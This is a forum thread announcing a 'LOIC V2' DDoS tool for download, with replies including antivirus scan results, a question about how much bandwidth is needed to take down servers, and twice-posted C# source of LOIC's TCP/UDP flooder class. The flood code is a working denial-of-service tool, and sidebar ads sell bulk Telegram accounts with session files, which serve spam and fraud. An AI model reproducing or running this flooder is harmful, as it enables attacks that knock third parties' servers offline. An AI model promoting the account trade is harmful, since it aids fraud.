Jump to content

Recommended Posts

Posted

LOIC Version 2 is ready!

I got the project, and i remake it, translated it to into Visual Basic.Net,

Also have updated the skin, and buttons, and 15% more powerful than old.

 

Those are the changes from the Version 1.

 

Preview:

 

i1fyqa.jpg

 

Credits: Me

 

Downloads:

Sourceforge.net - Mirror

Posted

from when dos/ddos tools and hacking shits allowed in forum? :D

That's true and you should post that in vip section anyway.

Virus scan ?

Posted

That's true and you should post that in vip section anyway.

Virus scan ?

 



Update




AhnLab-V3

-

20120425



AntiVir

-

20120425



Antiy-AVL

-

20120425



Avast

-

20120426



AVG

-

20120426



BitDefender

-

20120426



ByteHero

-

20120424



CAT-QuickHeal

-

20120425



ClamAV

HackTool.DDOS.LOIC-2

20120426



Commtouch

-

20120426



Comodo

-

20120426



DrWeb

-

20120426



Emsisoft

HackTool.Win32.Oylecann!IK

20120426



eSafe

-

20120425



eTrust-Vet

-

20120425



F-Prot

-

20120425



F-Secure

-

20120426



Fortinet

-

20120426



GData

-

20120426



Ikarus

HackTool.Win32.Oylecann

20120426



Jiangmin

-

20120425



K7AntiVirus

-

20120425



Kaspersky

HEUR:HackTool.MSIL.Flooder.gen

20120426



McAfee

Artemis!395EB361322D

20120426



McAfee-GW-Edition

Artemis!395EB361322D

20120425



Microsoft

-

20120426



NOD32

-

20120426



Norman

-

20120425



nProtect

-

20120425



Panda

-

20120425



PCTools

-

20120424



Rising

-

20120425



Sophos

Troj/Loic-A

20120426



SUPERAntiSpyware

-

20120402



Symantec

-

20120426



TheHacker

-

20120425



TrendMicro

-

20120425



TrendMicro-HouseCall

-

20120426



VBA32

-

20120425



VIPRE

-

20120425



ViRobot

-

20120425



VirusBuster

-

20120425

 

DDOS Tool, Hacking Tool, LOIC, go to google.com screenshoots to looking at there, LOIC V1, all ppl was downloaded it the same details have shown, it's not a clean virus, it's a ddos tool ^.^ i had builded from my vb.net, also, i am using it too, and as well, i will soon start making the new version of this tool (V3). Go search at google man. You will see ^.^ !

Posted

In my net i can have UPLOAD more than 100Mbps(Private Network), why with program i get only 15Mbps? Maby program is bad coded?

 

And, what speed i must have to take down servers;

MySpeed > ISP Speed?

 

 

  • 1 year later...
Posted

can some1 answer me i'm noob at this but when i donwloaded it , my anti-virus said it is an virus i know the ant-virus always say's that with hacking tools but i'm scarred this is a real virus with a keylogger and his going to steal my personal information. can somebody check it if it contains a keylogger or something?

 

-ps sry for my bad english

Posted (edited)

Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care.

 

You can't convert everything from Java/C#/C++ to vb.net. 

 

And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: 

using System;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace LOIC
{
        public class XXPFlooder
        {
                public bool IsFlooding;
                public int FloodCount;
                public string IP;
                public int Port;
                public int Protocol;
                public int Delay;
                public bool Resp;
                public string Data;
                private bool AllowRandom;

                public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random)
                {
                        this.IP = ip;
                        this.Port = port;
                        this.Protocol = proto;
                        this.Delay = delay;
                        this.Resp = resp;
                        this.Data = data;
                        this.AllowRandom = random;
                }
                public void Start()
                {
                        IsFlooding = true;
                        BackgroundWorker bw = new BackgroundWorker();
                        bw.DoWork += new DoWorkEventHandler(bw_DoWork);
                        bw.RunWorkerAsync();
                }
                private void bw_DoWork(object sender, DoWorkEventArgs e)
                {
                        try
                        {
                                byte[] buf;
                                IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
                                while (IsFlooding)
                                {
                                        Socket socket = null;
                                        if (Protocol == 1)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                                                socket.NoDelay = true;

                                                try { socket.Connect(RHost); }
                                                catch { continue; }

                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.Send(buf);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                        if (Protocol == 2)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.SendTo(buf, SocketFlags.None, RHost);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                }
                        }
                        catch { }
                }
        }
}
Edited by Aphelion
Posted

 

Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care.

 

You can't convert everything from Java/C#/C++ to vb.net. 

 

And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: 

using System;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace LOIC
{
        public class XXPFlooder
        {
                public bool IsFlooding;
                public int FloodCount;
                public string IP;
                public int Port;
                public int Protocol;
                public int Delay;
                public bool Resp;
                public string Data;
                private bool AllowRandom;

                public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random)
                {
                        this.IP = ip;
                        this.Port = port;
                        this.Protocol = proto;
                        this.Delay = delay;
                        this.Resp = resp;
                        this.Data = data;
                        this.AllowRandom = random;
                }
                public void Start()
                {
                        IsFlooding = true;
                        BackgroundWorker bw = new BackgroundWorker();
                        bw.DoWork += new DoWorkEventHandler(bw_DoWork);
                        bw.RunWorkerAsync();
                }
                private void bw_DoWork(object sender, DoWorkEventArgs e)
                {
                        try
                        {
                                byte[] buf;
                                IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
                                while (IsFlooding)
                                {
                                        Socket socket = null;
                                        if (Protocol == 1)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                                                socket.NoDelay = true;

                                                try { socket.Connect(RHost); }
                                                catch { continue; }

                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.Send(buf);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                        if (Protocol == 2)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.SendTo(buf, SocketFlags.None, RHost);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                }
                        }
                        catch { }
                }
        }
}

 

 

this isn't java, its C#

 

Few differences

 

 

using instead of import
bool Resp; instead of boolean Resp;
string Data; instead of String

 

So since C# is .net language I see it possible to be done.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



  • Posts

    • 📗 L2 BnB C3📗    🖱️Website: https://l2bnb.online/ ☢️ Safe:3 , Max:16 🎯Anti-Botting. 📖 Auto learning skills and Auto Loot 🎫 Subclass (NO) quest.  ❤️‍🔥 1hour Buffs/DS ,need Buffer (NO NPC Buffer) 🛠️ OfflineShop,ChangePass 🛒 GM Shop Only In Giran Town (D-C Grade-Arrows-Potions-Etc.)   📋BASIC FEATURES: 📢Exp/SP: x 3 📢Adena: x3 📢Drop: х3 📢Spoil: x3 ✉️ Support 24/7  🌐GLOBAL COMMUNITY  
    • Telegram Stars | 旧群组和频道 | 来自不同国家的账号 | Telegram Premium | 快速交付与折扣 Telegram Stars: Telegram Stars 在帖子中 | 1 星起价 $0.016 | 大量订单享受折扣 | 购买后 1 小时内交付 | 可能的拼写方式 Telegram Stars | 1 星起价 $0.0149 | 大量订单享受折扣 | 购买后 1 小时内交付 2023 年的真实旧 Telegram 群组。当前价格:$12。 群组和频道: 群组 IMPORT 和 REAL | 可选择 2014 到 2024!| 用于安全邀请 | 低价高质!| 起价 $1.8 Telegram 真实旧频道 (2022–2023: 可选年份) | 真实频道 | 所有权转移到您的账号 | 起价 $3 Telegram 真实旧群组 2024 | 起价 $4.5 Telegram 账号: Telegram 美国/加拿大 +1 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $2.5 Telegram 印度尼西亚 +62 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $2.5 Telegram 南非 +27 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $1.8 Telegram 菲律宾 +63 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $2 Telegram 以色列 +972 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $2.5 美国 (+1) 自动注册 | TDATA SESSION JSON 2FA | 包含 2FA | 起价 $0.5 加拿大 (+1) 自动注册 | TDATA SESSION JSON 2FA | 包含 2FA | 起价 $0.5 俄罗斯 (+7) | TDATA 格式 | 无垃圾封禁 | 包含 2FA(如启用)| 起价 $2 巴西 (+55) 自动注册 | TDATA SESSION JSON 2FA | 包含 2FA | 起价 $2.5 英国 (+44) 自动注册 | 注册超过 3 天 | TDATA SESSION JSON | 包含 2FA | 起价 $1.3 德国 (+49) 自动注册 | 注册超过 3 天 | TDATA SESSION JSON | 包含 2FA | 起价 $4 缅甸 (+95) 自动注册 | TDATA、SESSION、JSON、2FA | 包含 2FA | 起价 $0.38 孟加拉国 (+880) 自动注册 | TDATA/SESSION+JSON | 包含 2FA | 起价 $0.4 印度尼西亚 (+62) 自动注册 | 注册超过 3 天 | Session JSON/TDATA | 包含 2FA | 起价 $0.5 智利 (+56) 自动注册 | TDATA SESSION JSON 2FA | 包含 2FA | 起价 $0.8 菲律宾 (+63) 自动注册 | TDATA/SESSION+JSON | 包含 2FA | 起价 $0.64 旧 Telegram 账号: 最佳通用途账号 美国/加拿大 | 注册于 2024 年 11 月 (7 个月前) | 无垃圾封禁 | 未用于邀请或垃圾信息 | 在机器人和频道订阅中有活跃度 | 可用约 3000 个 | 格式: tdata 和 session+json | 实际价格: $1.95 最佳通用途账号 哥伦比亚/也门 | 注册于 2024 年 10 月 (8 个月前) | 无垃圾封禁 | 未用于邀请或垃圾信息 | 在机器人和频道订阅中有活跃度 | 可用约 600 个 | 格式: tdata 和 session+json | 实际价格: $1.95 Telegram Premium: Telegram Premium 1 个月订阅到您的账号 | 需要在您的账号中登录(通过 TDATA 或手机号)| 起价 $6 Telegram Premium 3 个月订阅到您的账号 | 无需在您的账号中登录 | 订阅期间提供完整保证 | 起价 $19 Telegram Premium 6 个月订阅到您的账号 | 无需在您的账号中登录 | 订阅期间提供完整保证 | 起价 $23 Telegram Premium 12 个月订阅到您的账号 | 无需在您的账号中登录 | 订阅期间提供完整保证 | 起价 $37 相关链接: 数字商品商店 (网站): 进入 购买 Telegram Stars 的 Telegram 机器人: 进入 SMM 面板: 进入 – 推广您的社交账号。 商店 Telegram 机器人: 进入 我们向您呈现当前的 促销和特别优惠,用于购买我们服务的产品: 1. 促销码 SEPTEMBER2025(9 月份在商店 (网站、机器人) 购物享受 10% 折扣)!首次购买还可使用促销码 SOCNET(享受 15% 折扣) 2. 注册后在我们网站输入格式为 "SEND ME BONUS, MY USERNAME IS..." 的用户名并在我们的论坛发帖,即可获得 $1 余额或 10–20% 折扣 3. 首次试用 SMM 面板即可获得 $1:只需在网站 (支持) 打开工单,主题写 “Get Trial Bonus” 4. 每周在我们的 Telegram 频道和购买 Stars 的机器人中赠送 Telegram Stars! 联系方式与支持: ➡ Telegram: https://t.me/socnet_support ✅ ➡ WhatsApp: https://wa.me/79051904467 ✅ ➡ Discord: socnet_support ✅ ➡ ✉ 邮箱: solomonbog@socnet.store ✅ 新闻资源: ➡ Telegram 频道: https://t.me/accsforyou_shop ✅ ➡ WhatsApp 频道: https://chat.whatsapp.com/K8rBy500nA73z27PxgaJUw?mode=ems_copy_t ✅ ➡ Discord 服务器: https://discord.gg/y9AStFFsrh ✅
    • Telegram Stars | 旧群组和频道 | 来自不同国家的账号 | Telegram Premium | 快速交付与折扣 Telegram Stars: Telegram Stars 在帖子中 | 1 星起价 $0.016 | 大量订单享受折扣 | 购买后 1 小时内交付 | 可能的拼写方式 Telegram Stars | 1 星起价 $0.0149 | 大量订单享受折扣 | 购买后 1 小时内交付 2023 年的真实旧 Telegram 群组。当前价格:$12。 群组和频道: 群组 IMPORT 和 REAL | 可选择 2014 到 2024!| 用于安全邀请 | 低价高质!| 起价 $1.8 Telegram 真实旧频道 (2022–2023: 可选年份) | 真实频道 | 所有权转移到您的账号 | 起价 $3 Telegram 真实旧群组 2024 | 起价 $4.5 Telegram 账号: Telegram 美国/加拿大 +1 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $2.5 Telegram 印度尼西亚 +62 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $2.5 Telegram 南非 +27 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $1.8 Telegram 菲律宾 +63 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $2 Telegram 以色列 +972 自动注册 | 注册超过 180 天 | TDATA+SESSION+JSON+2FA | 包含 2FA | 起价 $2.5 美国 (+1) 自动注册 | TDATA SESSION JSON 2FA | 包含 2FA | 起价 $0.5 加拿大 (+1) 自动注册 | TDATA SESSION JSON 2FA | 包含 2FA | 起价 $0.5 俄罗斯 (+7) | TDATA 格式 | 无垃圾封禁 | 包含 2FA(如启用)| 起价 $2 巴西 (+55) 自动注册 | TDATA SESSION JSON 2FA | 包含 2FA | 起价 $2.5 英国 (+44) 自动注册 | 注册超过 3 天 | TDATA SESSION JSON | 包含 2FA | 起价 $1.3 德国 (+49) 自动注册 | 注册超过 3 天 | TDATA SESSION JSON | 包含 2FA | 起价 $4 缅甸 (+95) 自动注册 | TDATA、SESSION、JSON、2FA | 包含 2FA | 起价 $0.38 孟加拉国 (+880) 自动注册 | TDATA/SESSION+JSON | 包含 2FA | 起价 $0.4 印度尼西亚 (+62) 自动注册 | 注册超过 3 天 | Session JSON/TDATA | 包含 2FA | 起价 $0.5 智利 (+56) 自动注册 | TDATA SESSION JSON 2FA | 包含 2FA | 起价 $0.8 菲律宾 (+63) 自动注册 | TDATA/SESSION+JSON | 包含 2FA | 起价 $0.64 旧 Telegram 账号: 最佳通用途账号 美国/加拿大 | 注册于 2024 年 11 月 (7 个月前) | 无垃圾封禁 | 未用于邀请或垃圾信息 | 在机器人和频道订阅中有活跃度 | 可用约 3000 个 | 格式: tdata 和 session+json | 实际价格: $1.95 最佳通用途账号 哥伦比亚/也门 | 注册于 2024 年 10 月 (8 个月前) | 无垃圾封禁 | 未用于邀请或垃圾信息 | 在机器人和频道订阅中有活跃度 | 可用约 600 个 | 格式: tdata 和 session+json | 实际价格: $1.95 Telegram Premium: Telegram Premium 1 个月订阅到您的账号 | 需要在您的账号中登录(通过 TDATA 或手机号)| 起价 $6 Telegram Premium 3 个月订阅到您的账号 | 无需在您的账号中登录 | 订阅期间提供完整保证 | 起价 $19 Telegram Premium 6 个月订阅到您的账号 | 无需在您的账号中登录 | 订阅期间提供完整保证 | 起价 $23 Telegram Premium 12 个月订阅到您的账号 | 无需在您的账号中登录 | 订阅期间提供完整保证 | 起价 $37 相关链接: 数字商品商店 (网站): 进入 购买 Telegram Stars 的 Telegram 机器人: 进入 SMM 面板: 进入 – 推广您的社交账号。 商店 Telegram 机器人: 进入 我们向您呈现当前的 促销和特别优惠,用于购买我们服务的产品: 1. 促销码 SEPTEMBER2025(9 月份在商店 (网站、机器人) 购物享受 10% 折扣)!首次购买还可使用促销码 SOCNET(享受 15% 折扣) 2. 注册后在我们网站输入格式为 "SEND ME BONUS, MY USERNAME IS..." 的用户名并在我们的论坛发帖,即可获得 $1 余额或 10–20% 折扣 3. 首次试用 SMM 面板即可获得 $1:只需在网站 (支持) 打开工单,主题写 “Get Trial Bonus” 4. 每周在我们的 Telegram 频道和购买 Stars 的机器人中赠送 Telegram Stars! 联系方式与支持: ➡ Telegram: https://t.me/socnet_support ✅ ➡ WhatsApp: https://wa.me/79051904467 ✅ ➡ Discord: socnet_support ✅ ➡ ✉ 邮箱: solomonbog@socnet.store ✅ 新闻资源: ➡ Telegram 频道: https://t.me/accsforyou_shop ✅ ➡ WhatsApp 频道: https://chat.whatsapp.com/K8rBy500nA73z27PxgaJUw?mode=ems_copy_t ✅ ➡ Discord 服务器: https://discord.gg/y9AStFFsrh ✅
    • Telegram Stars | Old groups and channels | Accounts from different countries | Telegram Premium | Fast delivery and discounts Telegram Stars: Telegram Stars on Post | 1 star from $0.016 | Discounts on bulk orders | Delivery within 1 hour after purchase | Possible spellings Telegram Stars | 1 star from $0.0149 | Discounts on bulk orders | Delivery within 1 hour after purchase Old real Telegram groups from 2023. Current price: $12. Groups and channels: Groups IMPORT and REAL | From 2014 to 2024 to choose from! | For safe invitations | Low price and high quality! | Price from $1.8 Telegram Real Old Channels (2022–2023: year of your choice) | Real Channel | Ownership transferred to your account | Price from $3 Old Real Telegram groups 2024 | Price from $4.5 Telegram accounts: Telegram USA/CANADA +1 Autoreg | Registered 180+ days ago | TDATA+SESSION+JSON+2FA | 2FA included | Price from $2.5 Telegram Indonesia +62 Autoreg | Registered 180+ days ago | TDATA+SESSION+JSON+2FA | 2FA included | Price from $2.5 Telegram South Africa +27 Autoreg | Registered 180+ days ago | TDATA+SESSION+JSON+2FA | 2FA included | Price from $1.8 Telegram Philippines +63 Autoreg | Registered 180+ days ago | TDATA+SESSION+JSON+2FA | 2FA included | Price from $2 Telegram Israel +972 Autoreg | Registered 180+ days ago | TDATA+SESSION+JSON+2FA | 2FA included | Price from $2.5 USA (+1) Autoreg | TDATA SESSION JSON 2FA | 2FA included | Price from $0.5 Canada (+1) Autoreg | TDATA SESSION JSON 2FA | 2FA included | Price from $0.5 Russia (+7) | TDATA format | No Spam Block | 2FA included (if enabled) | Price from $2 Brazil (+55) Autoreg | TDATA SESSION JSON 2FA | 2FA included | Price from $2.5 United Kingdom (+44) Autoreg | Registered 3+ days ago | TDATA SESSION JSON | 2FA included | Price from $1.3 Germany (+49) Autoreg | Registered 3+ days ago | TDATA SESSION JSON | 2FA included | Price from $4 Myanmar (+95) Autoreg | TDATA, SESSION, JSON, 2FA | 2FA included | Price from $0.38 Bangladesh (+880) Autoreg | TDATA/SESSION+JSON | 2FA included | Price from $0.4 Indonesia (+62) Autoreg | Registered 3+ days ago | Session JSON/TDATA | 2FA included | Price from $0.5 Chile (+56) Autoreg | TDATA SESSION JSON 2FA | 2FA included | Price from $0.8 Philippines (+63) Autoreg | TDATA/SESSION+JSON | 2FA included | Price from $0.64 Old Telegram accounts: Best accounts for any purpose USA/Canada | Registered in November 2024 (7 months ago) | No spam block | Not used for invites or spam | Activity in bots and channel subscriptions | Available: about 3000 pcs | Format: tdata and session+json | Actual Price: $1.95 Best accounts for any purpose Colombia/Yemen | Registered in October 2024 (8 months ago) | No spam block | Not used for invites or spam | Activity in bots and channel subscriptions | Available: about 600 pcs | Format: tdata and session+json | Actual Price: $1.95 Telegram Premium: Telegram Premium 1-month subscription to your account | Authorization in your account is required (via TDATA or phone number) | Price from $6 Telegram Premium 3-month subscription to your account | No authorization required in your account | Full guarantee during subscription period | Price from $19 Telegram Premium 6-month subscription to your account | No authorization required in your account | Full guarantee during subscription period | Price from $23 Telegram Premium 12-month subscription to your account | No authorization required in your account | Full guarantee during subscription period | Price from $37 Relevant links: Digital goods store (Website): Go Telegram bot for buying Telegram Stars: Go SMM Panel: Go – promotion of your social accounts. Telegram shop bot: Go We present you the current list of promotions and special offers for purchasing our service’s products: 1. Promo code SEPTEMBER2025 (10% discount) for purchases in our store (Website, bot) during September! You can also use promo code SOCNET for your first purchase (15% discount) 2. Get $1 to your store balance or a 10–20% discount, just write your username after registration on our website using the following template "SEND ME BONUS, MY USERNAME IS..." – you need to write this in our forum thread! 3. Get $1 for your first trial run of the SMM Panel: just open a ticket with the subject “Get Trial Bonus” on our website (Support). 4. Weekly giveaways of Telegram Stars in our Telegram channel and in our Telegram Stars purchase bot! Contacts and support: ➡ Telegram: https://t.me/socnet_support ✅ ➡ WhatsApp: https://wa.me/79051904467 ✅ ➡ Discord: socnet_support ✅ ➡ ✉ Email: solomonbog@socnet.store ✅ News resources: ➡ Telegram channel: https://t.me/accsforyou_shop ✅ ➡ WhatsApp channel: https://chat.whatsapp.com/K8rBy500nA73z27PxgaJUw?mode=ems_copy_t ✅ ➡ Discord server: https://discord.gg/y9AStFFsrh ✅
  • Topics

×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock